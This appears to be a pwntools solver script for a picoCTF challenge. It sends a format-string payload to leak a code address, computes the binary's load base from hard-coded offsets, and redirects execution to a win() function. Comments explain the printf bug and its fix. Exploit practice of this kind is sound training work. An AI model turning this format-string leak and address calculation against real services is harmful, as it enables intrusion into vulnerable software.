#!/usr/bin/env python
from pwn import *
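# Solver for a picoCTF challenge: read one leaked code address from the
# service's "name:" prompt, work out where the binary was loaded, and send
# back the runtime address of win().
#
# NOTE(review): the target's source is not part of this file. The leak below
# presumably works because the service hands the name to printf() as the
# format argument; confirm against the binary. On the target side that bug
# class is closed by printing with a fixed format, e.g. printf("%s", name).

# conn = process("./vuln")  # local run against the challenge binary instead
conn = remote('rescued-float.picoctf.net', 49587)

conn.recvuntil(b'name:')
# The run of %x conversions steps past the leading variadic slots; the '.'
# is a delimiter so the value printed by the final %lx can be cut out cleanly.
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
conn.recvuntil(b'.')
# Everything after the delimiter up to the newline is the leaked value in hex.
return_addr = int(conn.recvline(), 16)
# Log in hex so the value can be compared directly with a disassembly listing.
log.info(f"received return addr: {return_addr:#x}")
conn.recvuntil(b'12345: ')

# Offsets inside the binary. They are hard-coded for one specific build --
# presumably read from its symbol table; re-check them if the binary changes.
main_offset = 0x1400
win_offset = 0x136a
# Distance from the start of main to the leaked return address, going by the
# variable name -- TODO confirm against the disassembly.
call_fun_ret_offset = 65

main_addr = return_addr - call_fun_ret_offset
# Load base = runtime address of main minus main's offset in the file.
pie_base = main_addr - main_offset
# Kept separate from win_offset so an offset and an absolute address are
# never stored under the same name.
win_addr = pie_base + win_offset

conn.sendline(hex(win_addr).encode())
conn.recvline()
conn.interactive()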